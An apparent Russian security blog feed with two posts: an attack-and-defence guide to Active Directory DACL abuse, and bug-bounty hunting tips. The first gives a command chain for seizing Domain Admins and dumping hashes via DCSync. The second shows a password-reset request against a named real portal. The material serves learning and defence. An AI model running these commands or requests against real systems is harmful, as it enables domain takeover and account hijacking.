<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Dp2 (онлайн👨‍💻)</title><author><name>Dp2 (онлайн👨‍💻)</name></author><id>https://teletype.in/atom/dp4chat</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/dp4chat?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@dp4chat?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=dp4chat"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/dp4chat?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-10-11T04:33:36.583Z</updated><entry><id>dp4chat:CnaFjIed51n</id><link rel="alternate" type="text/html" href="https://teletype.in/@dp4chat/CnaFjIed51n?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=dp4chat"></link><title>DACL-атаки в Active Directory - комплексный анализ методов атаки и защиты</title><published>2025-03-15T21:28:19.799Z</published><updated>2025-03-15T22:01:20.526Z</updated><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/f7/f5/f7f51821-35c9-42cf-bb18-00b542af8576.jpeg&quot;&gt;DACL (Discretionary Access Control List) атаки представляют собой серьезную угрозу для безопасности Active Directory (AD). Эти атаки позволяют злоумышленникам использовать неправильно настроенные списки контроля доступа для повышения привилегий и получения несанкционированного доступа к критическим ресурсам сети.😳</summary><content type="html">
  &lt;p id=&quot;NFP3&quot;&gt;&lt;strong&gt;DACL (Discretionary Access Control List) &lt;/strong&gt;атаки представляют собой серьезную угрозу для безопасности Active Directory (AD). Эти атаки позволяют злоумышленникам использовать &lt;u&gt;неправильно настроенные списки контроля доступа для повышения привилегий и получения несанкционированного доступа к критическим ресурсам сети&lt;/u&gt;.😳&lt;/p&gt;
  &lt;p id=&quot;AGQe&quot;&gt;&lt;strong&gt;1. Основы DACL в Active Directory&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;XISa&quot;&gt;1.1 Что такое &lt;strong&gt;DACL &lt;/strong&gt;(Discretionary Access Control List) - &lt;strong&gt;это список, определяющий, какие субъекты безопасности (пользователи, группы) имеют доступ к объекту и какие действия они могут выполнять&lt;/strong&gt;. &lt;strong&gt;DACL состоит из ACE (Access Control Entries)&lt;/strong&gt;, каждая из которых определяет права доступа для конкретного субъекта. &lt;br /&gt;1.2 Роль DACL в безопасности AD DACL играют ключевую роль в обеспечении безопасности AD, контролируя доступ к объектам, таким как пользователи, группы, компьютеры и другие ресурсы. &lt;strong&gt;Неправильно настроенные DACL могут привести к серьезным нарушениям безопасности&lt;/strong&gt;.&lt;br /&gt;1.3 Типы ACE&lt;br /&gt;&lt;/p&gt;
  &lt;p id=&quot;cY18&quot;&gt;ACE (Access Control Entries) - это отдельные записи в DACL, определяющие права доступа. Основные типы ACE включают:&lt;/p&gt;
  &lt;ul id=&quot;XHsh&quot;&gt;
    &lt;li id=&quot;zQ9W&quot;&gt;ACCESS_ALLOWED_ACE: Предоставляет разрешение на определенные действия.&lt;/li&gt;
    &lt;li id=&quot;Pv4x&quot;&gt;ACCESS_DENIED_ACE: Явно запрещает определенные действия.&lt;/li&gt;
    &lt;li id=&quot;heRE&quot;&gt;SYSTEM_AUDIT_ACE: Определяет, какие действия должны быть зарегистрированы в журнале аудита безопасности.&lt;/li&gt;
    &lt;li id=&quot;PxeF&quot;&gt;ACCESS_ALLOWED_OBJECT_ACE: Специфичный для AD тип, позволяющий более детально контролировать доступ к свойствам объектов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;tkHO&quot;&gt;&amp;quot;Объектно-специфичные ACE используются только в Active Directory. В дополнение к членам структуры обычных ACE, объектно-специфичные ACE содержат дополнительные поля, такие как ObjectType (GUID, содержащий тип дочернего объекта, набор свойств или свойство, расширенное право или проверенную запись) и InheritedObjectType (указывает тип дочернего объекта, который может наследовать ACE).&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;bJFq&quot;&gt;&lt;br /&gt;2. Практический гайд для атакующего&lt;/p&gt;
  &lt;p id=&quot;rMli&quot;&gt;2.1 Инструменты для обнаружения и эксплуатации DACL-уязвимостей:&lt;/p&gt;
  &lt;p id=&quot;krjQ&quot;&gt;&lt;strong&gt;BloodHound&lt;/strong&gt;: Визуализация и анализ путей атак в AD&lt;br /&gt;&lt;strong&gt;PowerView&lt;/strong&gt;: Мощный инструмент для перечисления AD&lt;br /&gt;&lt;strong&gt;ADACLScanner&lt;/strong&gt;: Сканирование и анализ DACL объектов AD&lt;br /&gt;&lt;strong&gt;Adalanche&lt;/strong&gt;: Построение графов атак на основе DACL&lt;br /&gt;StandIn: Инструмент для эксплуатации DACL-уязвимостей&lt;br /&gt;&lt;strong&gt;Impacket&lt;/strong&gt;: Набор инструментов для работы с сетевыми протоколами&lt;br /&gt;PowerSploit: Фреймворк для пост-эксплуатации Windows&lt;br /&gt;SharpHound: Сборщик данных для BloodHound &lt;br /&gt;dacledit.py: Инструмент для анализа и модификации DACL&lt;/p&gt;
  &lt;p id=&quot;BIor&quot;&gt;a) Перечисление DACL:&lt;/p&gt;
  &lt;ul id=&quot;YLs9&quot;&gt;
    &lt;li id=&quot;0fA8&quot;&gt;Использование PowerView для получения ACL объектов:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;vToE&quot;&gt;&lt;code&gt;Get-DomainObjectAcl -Identity &amp;quot;CN=Administrator,CN=Users,DC=domain,DC=com&amp;quot; -ResolveGUIDs&lt;/code&gt;&lt;/p&gt;
  &lt;ul id=&quot;mjnl&quot;&gt;
    &lt;li id=&quot;6U7E&quot;&gt;Применение ADACLScanner для массового сканирования DACL:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;jYC8&quot;&gt;&lt;code&gt;.\ADACLScan.ps1 -Base &amp;quot;DC=domain,DC=com&amp;quot; -Output CSV -Filename &amp;quot;acl_scan_results.csv&amp;quot;&lt;/code&gt;&lt;/p&gt;
  &lt;ul id=&quot;tuDZ&quot;&gt;
    &lt;li id=&quot;IrTW&quot;&gt;Использование dacledit.py для анализа DACL конкретных объектов:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;dAzJ&quot;&gt;&lt;code&gt;python3 dacledit.py -principal user -target &amp;quot;CN=Administrators,CN=Builtin,DC=domain,DC=com&amp;quot; -dc-ip 10.10.10.10 domain.com/user:password&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;CnQ0&quot;&gt;2.2 &lt;strong&gt;Техники атаки:&lt;/strong&gt;&lt;br /&gt;a) Перечисление DACL:&lt;br /&gt;Использование PowerView для получения ACL объектов&lt;br /&gt;Применение ADACLScanner для массового сканирования DACL&lt;br /&gt;Использование dacledit.py для анализа DACL конкретных объектов&lt;br /&gt;b) &lt;strong&gt;Анализ путей атак:&lt;br /&gt;&lt;/strong&gt;Загрузка данных в BloodHound&lt;br /&gt;Использование Adalanche для построения графов атак&lt;br /&gt;Анализ выходных данных dacledit.py для выявления уязвимостей&lt;br /&gt;&lt;strong&gt;c) Эксплуатация уязвимостей (Неправильно настроенные DACL):&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;cPMY&quot;&gt;
    &lt;li id=&quot;6v7t&quot;&gt;WriteDACL: Позволяет изменять DACL целевого объекта, что может быть использовано для предоставления дополнительных прав.&lt;/li&gt;
    &lt;li id=&quot;mZmr&quot;&gt;WriteOwner: Дает возможность изменить владельца объекта, что часто позволяет получить полный контроль над объектом.&lt;/li&gt;
    &lt;li id=&quot;Ys00&quot;&gt;GenericAll: Предоставляет полный контроль над объектом, включая возможность изменения его атрибутов и DACL.&lt;/li&gt;
    &lt;li id=&quot;2YN0&quot;&gt;WriteProperty: Позволяет изменять определенные атрибуты объекта, что может быть использовано, например, для изменения членства в группах.&lt;/li&gt;
    &lt;li id=&quot;7hXu&quot;&gt;ForceChangePassword: Дает возможность принудительно изменить пароль пользователя без знания текущего пароля.&lt;/li&gt;
    &lt;li id=&quot;97li&quot;&gt;AddMembers: Позволяет добавлять пользователей в группы, что может быть использовано для повышения привилегий.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;y7WL&quot;&gt;&lt;br /&gt;d) &lt;strong&gt;Повышение привилегий&lt;/strong&gt;:&lt;/p&gt;
  &lt;ul id=&quot;wyP9&quot;&gt;
    &lt;li id=&quot;U5ET&quot;&gt;Добавление пользователя в привилегированную группу (например, &amp;quot;Domain Admins&amp;quot;) с использованием прав GenericAll или WriteProperty.&lt;/li&gt;
    &lt;li id=&quot;do5l&quot;&gt;Сброс пароля целевой учетной записи с высокими привилегиями с помощью права ForceChangePassword.&lt;/li&gt;
    &lt;li id=&quot;CS4g&quot;&gt;Использование делегирования Kerberos для получения доступа к ресурсам от имени привилегированного пользователя.&lt;/li&gt;
    &lt;li id=&quot;HtdQ&quot;&gt;Применение техники Shadow Credentials для получения доступа к учетным записям путем манипуляции с атрибутом msDS-KeyCredentialLink.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;3fjJ&quot;&gt;&lt;br /&gt;2.3 &lt;strong&gt;Пример атаки в полевых условиях&lt;/strong&gt;:&lt;/p&gt;
  &lt;p id=&quot;xUWc&quot;&gt;Первичный доступ: Получение учетных данных рядового пользователя&lt;br /&gt;Перечисление: Использование PowerView и BloodHound для анализа DACL&lt;/p&gt;
  &lt;p id=&quot;DYDd&quot;&gt;&lt;code&gt;Import-Module .\PowerView.ps1 Get-DomainObjectAcl -Identity &amp;quot;Domain Admins&amp;quot; -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match &amp;quot;GenericAll|WriteDacl|WriteOwner&amp;quot;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;ODDQ&quot;&gt;&lt;br /&gt;Обнаружение уязвимости: Нахождение объекта с WriteDACL для группы &amp;quot;Domain Admins&amp;quot;&lt;br /&gt;Эксплуатация: Изменение DACL для добавления контроля над группой&lt;/p&gt;
  &lt;p id=&quot;UtvV&quot;&gt;&lt;code&gt;python3 dacledit.py -action write -principal attacker -target &amp;quot;CN=Domain Admins,CN=Users,DC=domain,DC=com&amp;quot; -rights FullControl -dc-ip 10.10.10.10 domain.com/compromised_user:password&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;xuFG&quot;&gt;&lt;br /&gt;Повышение привилегий: Добавление своей учетной записи в группу &amp;quot;Domain Admins&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;L1HP&quot;&gt;&lt;code&gt;Add-DomainGroupMember -Identity &amp;#x27;Domain Admins&amp;#x27; -Members &amp;#x27;attacker&amp;#x27; -Verbose&lt;/code&gt;&lt;br /&gt;Использование привилегий Domain Admin для полного контроля над AD, например, выполнение DCSync атаки:&lt;/p&gt;
  &lt;p id=&quot;vRoU&quot;&gt;&lt;code&gt;secretsdump.py domain.com/attacker:&lt;a href=&quot;mailto:password@10.10.10.10&quot; target=&quot;_blank&quot;&gt;password@10.10.10.10&lt;/a&gt; -just-dc-ntlm&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;OSR2&quot;&gt;3. &lt;strong&gt;Гайд для Blue Team&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;ziem&quot;&gt;3.1 Инструменты для обнаружения и предотвращения DACL-атак:&lt;/p&gt;
  &lt;ul id=&quot;CbKb&quot;&gt;
    &lt;li id=&quot;TnqT&quot;&gt;Microsoft Advanced Threat Analytics (ATA): Анализирует поведение пользователей и сущностей для выявления подозрительной активности.&lt;/li&gt;
    &lt;li id=&quot;aQgg&quot;&gt;Varonis DatAdvantage: Предоставляет детальную визуализацию и аудит прав доступа в AD.&lt;/li&gt;
    &lt;li id=&quot;KpvU&quot;&gt;Tenable.ad: Специализированное решение для непрерывного мониторинга безопасности AD.&lt;/li&gt;
    &lt;li id=&quot;zbob&quot;&gt;PingCastle: Инструмент для оценки уровня безопасности AD, включая анализ DACL.&lt;/li&gt;
    &lt;li id=&quot;xgpC&quot;&gt;Purple Knight: Бесплатный инструмент для аудита безопасности AD.&lt;/li&gt;
    &lt;li id=&quot;2NTp&quot;&gt;Active Directory ACL Scanner: Позволяет сканировать и анализировать DACL в AD.&lt;/li&gt;
    &lt;li id=&quot;vhgf&quot;&gt;Microsoft Defender for Identity: Использует сигналы AD для обнаружения продвинутых угроз.&lt;/li&gt;
    &lt;li id=&quot;gxIQ&quot;&gt;Splunk для мониторинга событий AD: Позволяет собирать и анализировать логи событий AD для выявления аномалий.&lt;br /&gt;3.2 Техники защиты:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;BBLt&quot;&gt;a) &lt;strong&gt;Аудит и мониторинг:&lt;br /&gt;&lt;/strong&gt;&lt;u&gt;Регулярное сканирование DACL с помощью ADACLScanner&lt;br /&gt;Настройка аудита изменений DACL в групповых политиках&lt;br /&gt;Мониторинг подозрительных изменений DACL с помощью SIEM&lt;/u&gt;&lt;br /&gt;&lt;u&gt;Отслеживание событий ID 5136 и 4662 для обнаружения изменений DACL&lt;br /&gt;&lt;/u&gt;b) &lt;strong&gt;Ограничение прав:&lt;br /&gt;&lt;/strong&gt;Применение принципа наименьших привилегий&lt;br /&gt;&lt;u&gt;Использование Protected Users group для критических учетных записей&lt;br /&gt;&lt;/u&gt;Ограничение делегирования Kerberos&lt;br /&gt;Минимизация использования учетных записей с высокими привилегиями&lt;br /&gt;c) &lt;strong&gt;Hardening AD:&lt;br /&gt;&lt;/strong&gt;Регулярное обновление систем и приложений&lt;br /&gt;&lt;strong&gt;Применение рекомендаций Microsoft по безопасности AD&lt;br /&gt;&lt;/strong&gt;Использование LAPS для управления локальными админ паролями&lt;br /&gt;Внедрение многофакторной аутентификации&lt;br /&gt;Сегментация сети и изоляция критических систем&lt;br /&gt;d) Реагирование на инциденты:&lt;br /&gt;Разработка плана реагирования на DACL-атаки&lt;br /&gt;Подготовка скриптов для быстрого восстановления корректных DACL&lt;br /&gt;Тренировки по обнаружению и нейтрализации DACL-атак&lt;br /&gt;Создание процедур для быстрого отзыва скомпрометированных учетных данных&lt;/p&gt;
  &lt;p id=&quot;N1ki&quot;&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;br /&gt;DACL-атаки представляют собой серьезную угрозу для безопасности Active Directory. Атакующие могут использовать различные инструменты и техники для эксплуатации уязвимостей в конфигурации DACL, что потенциально может привести к полному захвату домена. Blue Team должна применять комплексный подход к защите, включающий регулярный аудит, мониторинг, ограничение прав и быстрое реагирование на инциденты. Важно понимать, что безопасность AD - это непрерывный процесс, требующий постоянного внимания и адаптации к новым угрозам.&lt;/p&gt;

</content></entry><entry><id>dp4chat:gs5Q2CAGI12</id><link rel="alternate" type="text/html" href="https://teletype.in/@dp4chat/gs5Q2CAGI12?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=dp4chat"></link><title>Bug Bounty 2025: Реальный подход к поиску уязвимостей</title><published>2025-02-13T22:10:53.704Z</published><updated>2025-02-13T22:12:16.928Z</updated><summary type="html">Главный принцип: количество &gt; сложность.</summary><content type="html">
  &lt;h2 id=&quot;YgQI&quot;&gt;🎯 Правда о современном Bug Bounty&lt;/h2&gt;
  &lt;h3 id=&quot;w6fq&quot;&gt;Эффект Santiago Lopez&lt;/h3&gt;
  &lt;ul id=&quot;WLFm&quot;&gt;
    &lt;li id=&quot;PfRh&quot;&gt;$1M+ на HackerOne&lt;/li&gt;
    &lt;li id=&quot;I0PW&quot;&gt;20-50 репортов в месяц&lt;/li&gt;
    &lt;li id=&quot;LeVc&quot;&gt;В основном Low/Medium баги&lt;/li&gt;
    &lt;li id=&quot;G65S&quot;&gt;$250-500 за баг&lt;/li&gt;
    &lt;li id=&quot;cUEJ&quot;&gt;До $25k в месяц&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;SqOm&quot; data-align=&quot;center&quot;&gt;Главный принцип: количество &amp;gt; сложность.&lt;/p&gt;
  &lt;p id=&quot;OxZe&quot;&gt;🔍 Как выбрать что тестировать:&lt;br /&gt;&lt;br /&gt;1. Правильные цели&lt;br /&gt;&lt;strong&gt;// High Priority:&lt;br /&gt;&lt;/strong&gt;- Enterprise SaaS (Salesforce, Atlassian)&lt;br /&gt;- Платежные системы&lt;br /&gt;- Админ панели &lt;br /&gt;- OAuth/SSO&lt;br /&gt;- File Upload функционал&lt;/p&gt;
  &lt;p id=&quot;4VCh&quot;&gt;&lt;strong&gt;// Medium Priority:&lt;br /&gt;&lt;/strong&gt;- User Management&lt;br /&gt;- Личные кабинеты&lt;br /&gt;- Поиск/Фильтры&lt;br /&gt;- API эндпоинты&lt;/p&gt;
  &lt;p id=&quot;5rOd&quot;&gt;&lt;strong&gt;// Low Priority:&lt;br /&gt;&lt;/strong&gt;- Статические страницы &lt;br /&gt;- Документация&lt;br /&gt;- Marketing сайты&lt;/p&gt;
  &lt;h3 id=&quot;X7lL&quot;&gt;2. &amp;quot;Чувствуем&amp;quot; продукт&lt;/h3&gt;
  &lt;ul id=&quot;VZ6E&quot;&gt;
    &lt;li id=&quot;sUav&quot;&gt;Если находите маленькую ошибку в UI = копайте глубже&lt;/li&gt;
    &lt;li id=&quot;vHfb&quot;&gt;Если документация не совпадает с реальностью = gold mine&lt;/li&gt;
    &lt;li id=&quot;tSNs&quot;&gt;Если видите legacy код = stay here&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2 id=&quot;wcBT&quot;&gt;💡 Практическая методология&lt;/h2&gt;
  &lt;h3 id=&quot;jDuE&quot;&gt;1. Тестируем с разных сторон&lt;/h3&gt;
  &lt;p id=&quot;9ksz&quot;&gt;&lt;u&gt;ВСЕГДА используем минимум 2 аккаунта:&lt;br /&gt;&lt;/u&gt;account1 -&amp;gt; делаем действие -&amp;gt; смотрим как видит account2&lt;/p&gt;
  &lt;p id=&quot;OiU1&quot;&gt;&lt;u&gt;# Проверяем с разных ролей:&lt;br /&gt;&lt;/u&gt;- free vs premium&lt;br /&gt;- user vs admin  &lt;br /&gt;- banned vs active&lt;/p&gt;
  &lt;p id=&quot;6nHn&quot;&gt;&lt;u&gt;# Тестируем с разных клиентов:&lt;br /&gt;&lt;/u&gt;- Web App&lt;br /&gt;- Mobile App&lt;br /&gt;- Desktop Client&lt;/p&gt;
  &lt;p id=&quot;Lh2i&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;O3AC&quot;&gt;2. Фокусируемся на одной функции&lt;/h3&gt;
  &lt;p id=&quot;WvhF&quot;&gt;// &lt;strong&gt;Пример&lt;/strong&gt;: File Upload&lt;br /&gt;1. До загрузки:&lt;br /&gt;- Проверка типов файлов&lt;br /&gt;- Валидация размера&lt;br /&gt;- Frontend проверки&lt;/p&gt;
  &lt;p id=&quot;IKNI&quot;&gt;2. Во время загрузки:&lt;br /&gt;- Путь сохранения&lt;br /&gt;- Обработка имени&lt;br /&gt;- Metadata&lt;/p&gt;
  &lt;p id=&quot;r5E2&quot;&gt;3. После загрузки:&lt;br /&gt;- Права доступа &lt;br /&gt;- Превью&lt;br /&gt;- Sharing функционал&lt;/p&gt;
  &lt;h3 id=&quot;vKMr&quot;&gt;3. Проверяем новые фичи&lt;/h3&gt;
  &lt;p id=&quot;IHQD&quot;&gt;// Признаки нового функционала:&lt;br /&gt;&amp;quot;beta&amp;quot;&lt;br /&gt;&amp;quot;new&amp;quot;&lt;br /&gt;&amp;quot;coming soon&amp;quot; &lt;br /&gt;&amp;quot;preview&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;IwMT&quot;&gt;// Почему это важно:&lt;br /&gt;- Меньше тестировщиков&lt;br /&gt;- Быстрая разработка&lt;br /&gt;- Меньше проверок&lt;br /&gt;- Часто без валидации&lt;/p&gt;
  &lt;h2 id=&quot;FUt3&quot;&gt;🛠 Техники тестирования&lt;/h2&gt;
  &lt;h3 id=&quot;n1ZZ&quot;&gt;1. &amp;quot;Спящий баг&amp;quot;&lt;/h3&gt;
  &lt;p id=&quot;V8kN&quot;&gt;// Ищем параметры типа:&lt;br /&gt;{&lt;br /&gt;  &amp;quot;debug&amp;quot;: false,&lt;br /&gt;  &amp;quot;beta&amp;quot;: false,&lt;br /&gt;  &amp;quot;admin&amp;quot;: false&lt;br /&gt;}&lt;/p&gt;
  &lt;p id=&quot;gkSZ&quot;&gt;// Пробуем:&lt;br /&gt;- Менять на true&lt;br /&gt;- Добавлять новые флаги&lt;br /&gt;- Следить за поведением&lt;/p&gt;
  &lt;h3 id=&quot;yKQm&quot;&gt;2. Permission Testing&lt;/h3&gt;
  &lt;p id=&quot;dLF6&quot;&gt;# 1. Читаем документацию:&lt;br /&gt;&amp;quot;Нужны права admin для X&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;py80&quot;&gt;# 2. Тестируем как user:&lt;br /&gt;Если работает = баг на $500&lt;/p&gt;
  &lt;p id=&quot;shoV&quot;&gt;# 3. Проверяем похожий функционал:&lt;br /&gt;/api/v1/admin/action1&lt;br /&gt;/api/v1/admin/action2&lt;br /&gt;/api/v1/admin/action3&lt;/p&gt;
  &lt;h3 id=&quot;MUNp&quot;&gt;3. Mobile API Abuse&lt;/h3&gt;
  &lt;p id=&quot;olvc&quot;&gt;// Мобильное API часто:&lt;br /&gt;- Имеет другой бэкенд&lt;br /&gt;- Меньше проверок&lt;br /&gt;- Больше параметров&lt;br /&gt;- Legacy эндпоинты&lt;/p&gt;
  &lt;p id=&quot;974Z&quot;&gt;// Ищем:&lt;br /&gt;- Разные endpoint URLs&lt;br /&gt;- Дополнительные параметры&lt;br /&gt;- Отсутствие валидации&lt;/p&gt;
  &lt;p id=&quot;MXMi&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;qfEj&quot;&gt;🎯 Реальный пример: &lt;/h2&gt;
  &lt;p id=&quot;vhUv&quot;&gt;Как это работает на практике:&lt;/p&gt;
  &lt;p id=&quot;0jOR&quot;&gt;1) Исследователи нашли админку:&lt;/p&gt;
  &lt;pre id=&quot;q63c&quot;&gt;codeportal.prod.subarucs.com/login.html&lt;/pre&gt;
  &lt;p id=&quot;ejJw&quot;&gt;2) Вместо сложного тестирования - просто смотрим JS:&lt;/p&gt;
  &lt;pre id=&quot;KAhB&quot;&gt; code$.ajax({
    url: &amp;quot;/forgotPassword/resetPassword.json&amp;quot;,
     {
        email: email,
        password: $(&amp;#x27;#new_password&amp;#x27;).val()
    }
})&lt;/pre&gt;
  &lt;p id=&quot;8q1l&quot;&gt;3) Заметили отсутствие валидации токена:&lt;/p&gt;
  &lt;pre id=&quot;V2YL&quot;&gt;POST /forgotPassword/resetPassword.json
{
  &amp;quot;email&amp;quot;: &amp;quot;employee@subaru.com&amp;quot;, 
  &amp;quot;password&amp;quot;: &amp;quot;new&amp;quot;
}&lt;/pre&gt;
  &lt;p id=&quot;B4Vw&quot;&gt;Результат = $&lt;/p&gt;
  &lt;h2 id=&quot;qV7G&quot;&gt;💎 Главные принципы успеха&lt;/h2&gt;
  &lt;ol id=&quot;50mr&quot;&gt;
    &lt;li id=&quot;Xv3a&quot;&gt;&lt;strong&gt;Регулярность &amp;gt; Сложность&lt;/strong&gt;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;ul id=&quot;ySad&quot;&gt;
    &lt;li id=&quot;WfRy&quot;&gt;2-3 часа каждый день&lt;/li&gt;
    &lt;li id=&quot;yrTD&quot;&gt;Один функционал за раз&lt;/li&gt;
    &lt;li id=&quot;5iDM&quot;&gt;Документируем всё&lt;/li&gt;
  &lt;/ul&gt;
  &lt;ol id=&quot;AVUV&quot;&gt;
    &lt;li id=&quot;c3GU&quot;&gt;&lt;strong&gt;Фокус на low hanging fruits&lt;/strong&gt;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;ul id=&quot;bL2z&quot;&gt;
    &lt;li id=&quot;AgNF&quot;&gt;Permission issues&lt;/li&gt;
    &lt;li id=&quot;dt8c&quot;&gt;XSS через обход фильтров&lt;/li&gt;
    &lt;li id=&quot;dFPh&quot;&gt;Простые IDOR&lt;/li&gt;
    &lt;li id=&quot;RGkf&quot;&gt;Basic file upload issues&lt;/li&gt;
  &lt;/ul&gt;
  &lt;ol id=&quot;Xxhj&quot;&gt;
    &lt;li id=&quot;yLUe&quot;&gt;&lt;strong&gt;Правильный выбор целей&lt;/strong&gt;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;ul id=&quot;gYCy&quot;&gt;
    &lt;li id=&quot;5PFo&quot;&gt;Enterprise системы&lt;/li&gt;
    &lt;li id=&quot;VIqM&quot;&gt;Новый функционал&lt;/li&gt;
    &lt;li id=&quot;fAqO&quot;&gt;Сложные интеграции&lt;/li&gt;
    &lt;li id=&quot;NSX6&quot;&gt;User management&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2 id=&quot;FHJC&quot;&gt;🎬 Важные советы&lt;/h2&gt;
  &lt;ol id=&quot;sOnd&quot;&gt;
    &lt;li id=&quot;qQoB&quot;&gt;Делаем перерывы:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;pre id=&quot;LvHv&quot;&gt; 2 часа тестирования
- 30 минут перерыв
- Смена функционала каждый день&lt;/pre&gt;
  &lt;ol id=&quot;clor&quot;&gt;
    &lt;li id=&quot;BtSe&quot;&gt;Ведем статистику:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;pre id=&quot;mIzI&quot;&gt;- Какие типы багов находятся чаще
- Где самый высокий ROI
- Сколько времени на каждый функционал&lt;/pre&gt;
  &lt;ol id=&quot;H1Y9&quot;&gt;
    &lt;li id=&quot;G1Ky&quot;&gt;Не усложняем:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;pre id=&quot;O9xU&quot;&gt;- Минимум автоматизации
- Простые инструменты
- Фокус на одной цели&lt;/pre&gt;
  &lt;p id=&quot;rJRp&quot;&gt;Помните: Santiago Lopez стал миллионером не находя RCE, а методично тестируя простые вещи каждый день.&lt;/p&gt;
  &lt;p id=&quot;xYgH&quot;&gt;&lt;code&gt;Всем спасибо :D&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;

</content></entry></feed>